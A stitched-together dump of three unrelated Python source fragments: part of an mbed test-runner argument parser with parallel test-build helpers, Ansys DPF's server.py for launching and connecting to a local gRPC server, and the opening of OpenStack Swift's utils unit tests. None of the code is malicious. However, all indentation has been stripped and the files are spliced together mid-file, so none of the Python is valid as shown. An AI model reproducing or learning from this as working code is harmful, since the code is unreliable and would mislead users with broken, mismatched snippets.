# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_argument('--auto',
dest='auto_detect',
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
toolchain_list = list(TOOLCHAINS) + ["DEFAULT", "ALL"]
parser.add_argument('--tc',
dest='toolchains_filter',
type=argparse_many(argparse_uppercase_type(toolchain_list, "toolchains")),
help="Toolchain filter for --auto argument. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_argument('--oper',
dest='operability_checks',
type=argparse_lowercase_type(get_available_oper_test_scopes(), "scopes"),
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_argument('--clean',
dest='clean',
action="store_true",
help='Clean the build directory')
parser.add_argument('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_argument("--profile", dest="profile", action="append",
type=argparse_filestring_type,
default=[])
parser.add_argument('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
help='Test only board internals. Skip perpherials tests and perform common tests')
parser.add_argument('-n', '--test-by-names',
dest='test_by_names',
type=argparse_many(str),
help='Runs only test enumerated it this switch. Use comma to separate test case names')
parser.add_argument('-p', '--peripheral-by-names',
dest='peripheral_by_names',
type=argparse_many(str),
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_argument('-c', '--copy-method',
dest='copy_method',
type=argparse_uppercase_type(copy_methods, "flash method"),
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_argument('-r', '--reset-type',
dest='mut_reset_type',
default=None,
type=argparse_uppercase_type(reset_methods, "reset method"),
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_argument('-g', '--goanna-for-tests',
dest='goanna_for_tests',
action="store_true",
help='Run Goanna static analyse tool for tests. (Project will be rebuilded)')
parser.add_argument('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
action="store_true",
help='Run Goanna static analyse tool for mbed SDK (Project will be rebuilded)')
parser.add_argument('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
help='Suppresses display of wellformatted table with test results')
parser.add_argument('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
help='Displays wellformatted table with test x toolchain test result per target')
parser.add_argument('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_argument('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_argument("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_argument("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_argument('--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
help='Experimental, you execute test runners for connected to your host MUTs in parallel (speeds up test result collection)')
parser.add_argument('--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
help='Displays full test specification and MUTs configration and exits')
parser.add_argument('--loops',
dest='test_loops_list',
type=argparse_many(str),
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_argument('--global-loops',
dest='test_global_loops_value',
type=int,
help='Set global number of test loops per test. Default value is set 1')
parser.add_argument('--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall argument. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_argument('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops arguments. Tests until OK result occurs and assumes test passed')
parser.add_argument('-N', '--firmware-name',
dest='firmware_global_name',
help='Set global name for all produced projects. Note, proper file extension will be added by buid scripts')
parser.add_argument('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_argument('--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_argument('-f', '--filter',
dest='general_filter_regex',
type=argparse_many(str),
default=None,
help='For some commands you can use filter to filter out results')
parser.add_argument('--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type=int,
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_argument('--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_argument('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_argument('--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_argument('--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_argument("--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_argument("--report-text",
dest="report_text_file_name",
help="Output the build results to a text file")
parser.add_argument('--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_argument('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_argument('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_argument('--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
return parser
def test_path_to_name(path, base):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
This can eventually be overriden by a to-be-determined meta-data mechanism"""
name_parts = []
head, tail = os.path.split(relpath(path,base))
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def find_tests(base_dir, target_name, toolchain_name, app_config=None):
""" Finds all tests in a directory recursively
base_dir: path to the directory to scan for tests (ex. 'path/to/project')
target_name: name of the target to use for scanning (ex. 'K64F')
toolchain_name: name of the toolchain to use for scanning (ex. 'GCC_ARM')
options: Compile options to pass to the toolchain (ex. ['debug-info'])
app_config - location of a chosen mbed_app.json file
"""
tests = {}
# Prepare the toolchain
toolchain = prepare_toolchain([base_dir], target_name, toolchain_name,
silent=True, app_config=app_config)
# Scan the directory for paths to probe for 'TESTS' folders
base_resources = scan_resources([base_dir], toolchain)
dirs = base_resources.inc_dirs
for directory in dirs:
subdirs = os.listdir(directory)
# If the directory contains a subdirectory called 'TESTS', scan it for test cases
if 'TESTS' in subdirs:
walk_base_dir = join(directory, 'TESTS')
test_resources = toolchain.scan_resources(walk_base_dir, base_path=base_dir)
# Loop through all subdirectories
for d in test_resources.inc_dirs:
# If the test case folder is not called 'host_tests' and it is
# located two folders down from the main 'TESTS' folder (ex. TESTS/testgroup/testcase)
# then add it to the tests
path_depth = get_path_depth(relpath(d, walk_base_dir))
if path_depth == 2:
test_group_directory_path, test_case_directory = os.path.split(d)
test_group_directory = os.path.basename(test_group_directory_path)
# Check to make sure discoverd folder is not in a host test directory
if test_case_directory != 'host_tests' and test_group_directory != 'host_tests':
test_name = test_path_to_name(d, base_dir)
tests[test_name] = d
return tests
def print_tests(tests, format="list", sort=True):
"""Given a dictionary of tests (as returned from "find_tests"), print them
in the specified format"""
if format == "list":
for test_name in sorted(tests.keys()):
test_path = tests[test_name]
print "Test Case:"
print " Name: %s" % test_name
print " Path: %s" % test_path
elif format == "json":
print json.dumps(tests, indent=2)
else:
print "Unknown format '%s'" % format
sys.exit(1)
def norm_relative_path(path, start):
"""This function will create a normalized, relative path. It mimics the
python os.path.relpath function, but also normalizes a Windows-syle path
that use backslashes to a Unix style path that uses forward slashes."""
path = os.path.normpath(path)
path = os.path.relpath(path, start)
path = path.replace("\\", "/")
return path
def build_test_worker(*args, **kwargs):
"""This is a worker function for the parallel building of tests. The `args`
and `kwargs` are passed directly to `build_project`. It returns a dictionary
with the following structure:
{
'result': `True` if no exceptions were thrown, `False` otherwise
'reason': Instance of exception that was thrown on failure
'bin_file': Path to the created binary if `build_project` was
successful. Not present otherwise
'kwargs': The keyword arguments that were passed to `build_project`.
This includes arguments that were modified (ex. report)
}
"""
bin_file = None
ret = {
'result': False,
'args': args,
'kwargs': kwargs
}
# Use parent TOOLCHAIN_PATHS variable
for key, value in kwargs['toolchain_paths'].iteritems():
TOOLCHAIN_PATHS[key] = value
del kwargs['toolchain_paths']
try:
bin_file = build_project(*args, **kwargs)
ret['result'] = True
ret['bin_file'] = bin_file
ret['kwargs'] = kwargs
except NotSupportedException, e:
ret['reason'] = e
except ToolException, e:
ret['reason'] = e
except KeyboardInterrupt, e:
ret['reason'] = e
except:
# Print unhandled exceptions here
import traceback
traceback.print_exc(file=sys.stdout)
return ret
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
clean=False, notify=None, verbose=False, jobs=1, macros=None,
silent=False, report=None, properties=None,
continue_on_build_fail=False, app_config=None,
build_profile=None):
"""Given the data structure from 'find_tests' and the typical build parameters,
build all the tests
Returns a tuple of the build result (True or False) followed by the test
build data structure"""
execution_directory = "."
base_path = norm_relative_path(build_path, execution_directory)
target_name = target if isinstance(target, str) else target.name
cfg, macros, features = get_config(base_source_paths, target_name, toolchain_name)
baud_rate = 9600
if 'platform.stdio-baud-rate' in cfg:
baud_rate = cfg['platform.stdio-baud-rate'].value
test_build = {
"platform": target_name,
"toolchain": toolchain_name,
"base_path": base_path,
"baud_rate": baud_rate,
"binary_type": "bootable",
"tests": {}
}
result = True
jobs_count = int(jobs if jobs else cpu_count())
p = Pool(processes=jobs_count)
results = []
for test_name, test_path in tests.iteritems():
test_build_path = os.path.join(build_path, test_path)
src_path = base_source_paths + [test_path]
bin_file = None
test_case_folder_name = os.path.basename(test_path)
args = (src_path, test_build_path, target, toolchain_name)
kwargs = {
'jobs': 1,
'clean': clean,
'macros': macros,
'name': test_case_folder_name,
'project_id': test_name,
'report': report,
'properties': properties,
'verbose': verbose,
'app_config': app_config,
'build_profile': build_profile,
'silent': True,
'toolchain_paths': TOOLCHAIN_PATHS
}
results.append(p.apply_async(build_test_worker, args, kwargs))
p.close()
result = True
itr = 0
while len(results):
itr += 1
if itr > 360000:
p.terminate()
p.join()
raise ToolException("Compile did not finish in 10 minutes")
else:
sleep(0.01)
pending = 0
for r in results:
if r.ready() is True:
try:
worker_result = r.get()
results.remove(r)
# Take report from the kwargs and merge it into existing report
report_entry = worker_result['kwargs']['report'][target_name][toolchain_name]
for test_key in report_entry.keys():
report[target_name][toolchain_name][test_key] = report_entry[test_key]
# Set the overall result to a failure if a build failure occurred
if not worker_result['result'] and not isinstance(worker_result['reason'], NotSupportedException):
result = False
break
# Adding binary path to test build result
if worker_result['result'] and 'bin_file' in worker_result:
bin_file = norm_relative_path(worker_result['bin_file'], execution_directory)
test_build['tests'][worker_result['kwargs']['project_id']] = {
"binaries": [
{
"path": bin_file
}
]
}
test_key = worker_result['kwargs']['project_id'].upper()
print report[target_name][toolchain_name][test_key][0][0]['output'].rstrip()
print 'Image: %s\n' % bin_file
except:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
p.join()
raise
else:
pending += 1
if pending >= jobs_count:
break
# Break as soon as possible if there is a failure and we are not
# continuing on build failures
if not result and not continue_on_build_fail:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
break
p.join()
test_builds = {}
test_builds["%s-%s" % (target_name, toolchain_name)] = test_build
return result, test_builds
def test_spec_from_test_builds(test_builds):
return {
"builds": test_builds
}
|
server.py | """
Server
======
Contains the directives necessary to start the DPF server.
"""
from threading import Thread
import io
import platform
import logging
import time
import os
import socket
import subprocess
import grpc
import psutil
import weakref
import atexit
import copy
from ansys import dpf
from ansys.dpf.core.misc import find_ansys, is_ubuntu
from ansys.dpf.core import errors
from ansys.dpf.core._version import __ansys_version__
MAX_PORT = 65535
LOG = logging.getLogger(__name__)
LOG.setLevel('DEBUG')
# default DPF server port
DPF_DEFAULT_PORT = int(os.environ.get('DPF_PORT',50054))
LOCALHOST = os.environ.get('DPF_IP','127.0.0.1')
def shutdown_global_server():
try :
if dpf.core.SERVER != None:
del dpf.core.SERVER
except:
pass
atexit.register(shutdown_global_server)
def has_local_server():
"""Check if a local DPF gRPC server has been created.
Returns
-------
bool
``True`` when a local DPF gRPC server has been created.
"""
return dpf.core.SERVER is not None
def _global_server():
"""Retrieve the global server if it exists.
If the global server has not been specified, check if the user
has specified the "DPF_START_SERVER" environment variable. If
``True``, start the server locally. If ``False``, connect to the
existing server.
"""
if dpf.core.SERVER is None:
if os.environ.get('DPF_START_SERVER', '').lower() == 'false':
ip = os.environ.get('DPF_IP', LOCALHOST)
port = int(os.environ.get('DPF_PORT', DPF_DEFAULT_PORT))
connect_to_server(ip, port)
else:
start_local_server()
return dpf.core.SERVER
def port_in_use(port, host=LOCALHOST):
"""Check if a port is in use at the given host.
The port must actually "bind" the address. Just checking to see if a
socket can be created is insufficient because it's possible to run into
permission errors like: ``An attempt was made to access a socket in a way
forbidden by its access permissions.``
Returns
-------
bool
``True`` when the port is in use, ``False`` when free.
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
try:
sock.bind((host, port))
return False
except:
return True
def check_valid_ip(ip):
"""Check if a valid IP address is entered.
This method raises an error when an invalid IP address is entered.
"""
try:
socket.inet_aton(ip)
except OSError:
raise ValueError(f'Invalid IP address "{ip}"')
def shutdown_all_session_servers():
"""Shut down all active servers created by this module."""
from ansys.dpf.core import _server_instances
copy_instances = copy.deepcopy(_server_instances)
for instance in copy_instances:
try:
instance().shutdown()
except Exception as e:
print(e.args)
pass
def start_local_server(ip=LOCALHOST, port=DPF_DEFAULT_PORT,
ansys_path=None, as_global=True, load_operators=True):
"""Start a new local DPF server at a given port and IP address.
This method requires Windows and ANSYS 2021 R1 or later. If ``as_global=True``, which is
the default) the server is stored globally, replacing the one stored previously.
Otherwise, a user must keep a handle on their server.
Parameters
----------
ip : str, optional
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
ansys_path : str, optional
Root path for the Ansys installation directory. For example, ``"/ansys_inc/v212/"``.
The default is the latest Ansys installation.
as_global : bool, optional
Global variable that stores the IP address and port for the DPF
module. All DPF objects created in this Python session will
use this IP and port. The default is ``True``.
load_operators : bool, optional
Whether to automatically load the math operators. The default is ``True``.
Returns
-------
server : server.DpfServer
"""
if ansys_path is None:
ansys_path = os.environ.get('AWP_ROOT'+__ansys_version__, find_ansys())
if ansys_path is None:
raise ValueError('Unable to automatically locate the Ansys path. '
'Manually enter one when starting the server or set it '
'as the environment variable "ANSYS_PATH"')
# verify path exists
if not os.path.isdir(ansys_path):
raise NotADirectoryError(f'Invalid Ansys path "{ansys_path}"')
# parse the version to an int and check for supported
try:
ver = int(ansys_path[-3:])
if ver < 211:
raise errors.InvalidANSYSVersionError(f'Ansys v{ver} does not support DPF')
if ver == 211 and is_ubuntu():
raise OSError('DPF on v211 does not support Ubuntu')
except ValueError:
pass
# avoid using any ports in use from existing servers
used_ports=[]
if dpf.core._server_instances:
for srv in dpf.core._server_instances:
if srv():
used_ports.append(srv().port)
while port in used_ports:
port += 1
# verify port is free
while port_in_use(port):
port += 1
server = None
n_attempts = 10
for _ in range(n_attempts):
try:
server = DpfServer(ansys_path, ip, port,as_global= as_global, load_operators = load_operators)
break
except errors.InvalidPortError: # allow socket in use errors
port += 1
if server is None:
raise OSError(f'Unable to launch the server after {n_attempts} attempts. '
'Check the following path:\n{ansys_path}\n\n'
'or attempt to use a different port')
dpf.core._server_instances.append(weakref.ref(server))
return server
def connect_to_server(ip=LOCALHOST, port=DPF_DEFAULT_PORT, as_global=True, timeout=5):
"""Connect to an existing DPF server.
This method sets the global default channel that is then used for the
duration of the DPF sesssion.
Parameters
----------
ip : str
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
as_global : bool, optional
Global variable that stores the IP address and port for the DPF
module. All DPF objects created in this Python session will
use this IP and port. The default is ``True``.
timeout : float, optional
Maximum number of seconds for the initalization attempt.
The default is ``10``. Once the specified number of seconds
passes, the connection fails.
Examples
--------
>>> from ansys.dpf import core as dpf
Create a server.
>>> #server = dpf.start_local_server(ip = '127.0.0.1')
>>> #port = server.port
Connect to a remote server at a non-default port.
>>> #specified_server = dpf.connect_to_server('127.0.0.1', port, as_global=False)
Connect to the localhost at the default port.
>>> #unspecified_server = dpf.connect_to_server(as_global=False)
"""
server = DpfServer(ip=ip, port=port, as_global=as_global, launch_server=False)
dpf.core._server_instances.append(weakref.ref(server))
return server
class DpfServer:
"""Provides an instance of the DPF server.
Parameters
-----------
server_bin : str
Path for the DPF executable.
ip : str
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
timeout : float, optional
Maximum number of seconds for the initalization attempt.
The default is ``10``. Once the specified number of seconds
passes, the connection fails.
as_global : bool, optional
Global variable that stores the IP address and port for the DPF
module. All DPF objects created in this Python session will
use this IP and port. The default is ``True``.
load_operators : bool, optional
Whether to automatically load the math operators. The default
is ``True``.
launch_server : bool, optional
Whether to launch the server on Windows.
"""
def __init__(self, ansys_path="", ip=LOCALHOST, port=DPF_DEFAULT_PORT,
timeout=10, as_global=True, load_operators=True, launch_server=True):
"""Start the DPF server."""
# check valid ip and port
check_valid_ip(ip)
if not isinstance(port, int):
raise ValueError('Port must be an integer')
if os.name == 'posix' and 'ubuntu' in platform.platform().lower():
raise OSError('DPF does not support Ubuntu')
elif launch_server:
launch_dpf(ansys_path, ip, port)
self.channel = grpc.insecure_channel('%s:%d' % (ip, port))
if launch_server is False:
state = grpc.channel_ready_future(self.channel)
# verify connection has matured
tstart = time.time()
while ((time.time() - tstart) < timeout) and not state._matured:
time.sleep(0.01)
if not state._matured:
raise TimeoutError(f'Failed to connect to {ip}:{port} in {timeout} seconds')
LOG.debug('Established connection to DPF gRPC')
# assign to global channel when requested
if as_global:
dpf.core.SERVER =self
# TODO: add to PIDs ...
# store port and ip for later reference
self.live = True
self.ansys_path=ansys_path
self._input_ip = ip
self._input_port = port
self._own_process = launch_server
@property
def _base_service(self):
if not hasattr(self,"__base_service"):
from ansys.dpf.core.core import BaseService
self.__base_service = BaseService(self, timeout=1)
return self.__base_service
@property
def info(self):
"""Server information.
Returns
-------
info : dictionary
Dictionary with server information, including ``"server_ip"``,
``"server_port"``, ``"server_process_id"``, and
``"server_version"`` keys.
"""
return self._base_service.server_info
@property
def ip(self):
"""IP address of the server.
Returns
-------
ip : str
"""
try:
return self._base_service.server_info["server_ip"]
except:
return ""
@property
def port(self):
"""Port of the server.
Returns
-------
port : int
"""
try:
return self._base_service.server_info["server_port"]
except:
return 0
@property
def version(self):
"""Version of the server.
Returns
-------
version : str
"""
return self._base_service.server_info["server_version"]
def __str__(self):
return f'DPF Server: {self.info}'
def shutdown(self):
if self._own_process and self.live and self._base_service:
self._base_service._prepare_shutdown()
p = psutil.Process(self._base_service.server_info["server_process_id"])
p.kill()
time.sleep(0.1)
self.live = False
try:
if id(dpf.core.SERVER) == id(self):
dpf.core.SERVER =None
except:
pass
try:
for i, server in enumerate(dpf.core._server_instances):
if server() == self:
dpf.core._server_instances.remove(server)
except:
pass
def __eq__(self,other_server):
"""Return true, if the ip and the port are equals"""
if isinstance(other_server, DpfServer):
return self.ip == other_server.ip and self.port == other_server.port
return False
def __ne__(self,other_server):
"""Return true, if the ip or the port are different"""
return not self.__eq__(other_server)
def __del__(self):
try:
self.shutdown()
except:
pass
def check_version(self, required_version, msg = None):
"""Check if the server version matches with a required version.
Parameters
----------
required_version : str
Required version to compare with the server version.
msg : str, optional
Message for the raised exception if version requirements do not match.
Raises
------
dpf_errors : errors
errors.DpfVersionNotSupported is raised if failure.
Returns
-------
bool
``True`` if the server version meets the requirement.
"""
from ansys.dpf.core.check_version import server_meet_version_and_raise
return server_meet_version_and_raise(required_version, self, msg)
def launch_dpf(ansys_path, ip=LOCALHOST, port=DPF_DEFAULT_PORT, timeout=10):
"""Launch Ansys DPF.
Parameters
----------
ansys_path : str, optional
Root path for the Ansys installation directory. For example, ``"/ansys_inc/v212/"``.
The default is the latest Ansys installation.
ip : str, optional
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
timeout : float, optional
Maximum number of seconds for the initalization attempt.
The default is ``10``. Once the specified number of seconds
passes, the connection fails.
Returns
-------
process : subprocess.Popen
DPF Process.
"""
if os.name == 'nt':
run_cmd = f'Ans.Dpf.Grpc.bat --address {ip} --port {port}'
path_in_install = "aisol/bin/winx64"
else:
run_cmd = ['./Ans.Dpf.Grpc.sh',f'--address {ip}',f'--port {port}']
path_in_install = "aisol/bin/linx64"
# verify ansys path is valid
if os.path.isdir(f'{ansys_path}/{path_in_install}'):
dpf_run_dir = f'{ansys_path}/{path_in_install}'
else:
dpf_run_dir = f'{ansys_path}'
if not os.path.isdir(dpf_run_dir):
raise NotADirectoryError(f'Invalid ansys path at "{ansys_path}". '
'Unable to locate the directory containing DPF at '
f'"{dpf_run_dir}"')
old_dir = os.getcwd()
os.chdir(dpf_run_dir)
process = subprocess.Popen(run_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
os.chdir(old_dir)
# check to see if the service started
lines = []
def read_stdout():
for line in io.TextIOWrapper(process.stdout, encoding="utf-8"):
LOG.debug(line)
lines.append(line)
errors = []
def read_stderr():
for line in io.TextIOWrapper(process.stderr, encoding="utf-8"):
LOG.error(line)
errors.append(line)
# must be in the background since the process reader is blocking
Thread(target=read_stdout, daemon=True).start()
Thread(target=read_stderr, daemon=True).start()
t_timeout = time.time() + timeout
started = False
while not started:
started = any('server started' in line for line in lines)
if time.time() > t_timeout:
raise TimeoutError(f'Server did not start in {timeout} seconds')
# verify there were no errors
time.sleep(1)
if errors:
try:
process.kill()
except PermissionError:
pass
errstr = '\n'.join(errors)
if 'Only one usage of each socket address' in errstr:
raise errors.InvalidPortError(f'Port {port} in use')
raise RuntimeError(errstr)
|
test_utils.py | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from test.unit import temptree
import ctypes
import errno
import eventlet
import eventlet.event
import logging
import os
import random
import re
import socket
import sys
from textwrap import dedent
import tempfile
import threading
import time
import unittest
import fcntl
import shutil
from contextlib import nested
from Queue import Queue, Empty
from getpass import getuser
from shutil import rmtree
from StringIO import StringIO
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from swift.common.exceptions import (Timeout, MessageTimeout,
ConnectionTimeout, LockTimeout,
ReplicationLockTimeout)
from swift.common import utils
from swift.common.swob import Response
from test.unit import FakeLogger
class MockOs():
def __init__(self, pass_funcs=[], called_funcs=[], raise_funcs=[]):
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket():
def __init__(self):
self.sent = []
def sendto(self, data, target):
self.sent.append((data, target))
def close(self):
pass
class MockSys():
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def setUp(self):
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
def test_lock_path(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1):
exc = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except LockTimeout as err:
exc = err
self.assertTrue(exc is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_lock_path_class(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is not None)
self.assertTrue(exc2 is None)
self.assertTrue(not success)
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is None)
self.assertTrue(exc2 is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_normalize_timestamp(self):
# Test swift.common.utils.normalize_timestamp
self.assertEquals(utils.normalize_timestamp('1253327593.48174'),
"1253327593.48174")
self.assertEquals(utils.normalize_timestamp(1253327593.48174),
"1253327593.48174")
self.assertEquals(utils.normalize_timestamp('1253327593.48'),
"1253327593.48000")
self.assertEquals(utils.normalize_timestamp(1253327593.48),
"1253327593.48000")
self.assertEquals(utils.normalize_timestamp('253327593.48'),
"0253327593.48000")
self.assertEquals(utils.normalize_timestamp(253327593.48),
"0253327593.48000")
self.assertEquals(utils.normalize_timestamp('1253327593'),
"1253327593.00000")
self.assertEquals(utils.normalize_timestamp(1253327593),
"1253327593.00000")
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_backwards(self):
# Test swift.common.utils.backward
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = ['123456789x12345678><123456789\n', # block larger than rest
'123456789x123>\n', # block ends just before \n character
'123423456789\n',
'123456789x\n', # block ends at the end of line
'<123456789x123456789x123\n',
'<6789x123\n', # block ends at the beginning of the line
'6789x1234\n',
'1234><234\n', # block ends typically in the middle of line
'123456789x123456789\n']
with TemporaryFile('r+w') as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEquals(line, lines[count].split('\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEquals([], list(utils.backward(f)))
def test_mkdirs(self):
testroot = os.path.join(os.path.dirname(__file__), 'mkdirs')
try:
os.unlink(testroot)
except Exception:
pass
rmtree(testroot, ignore_errors=1)
self.assert_(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assert_(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assert_(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
def test_split_path(self):
# Test swift.common.utils.split_account_path
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEquals(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEquals(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEquals(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEquals(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
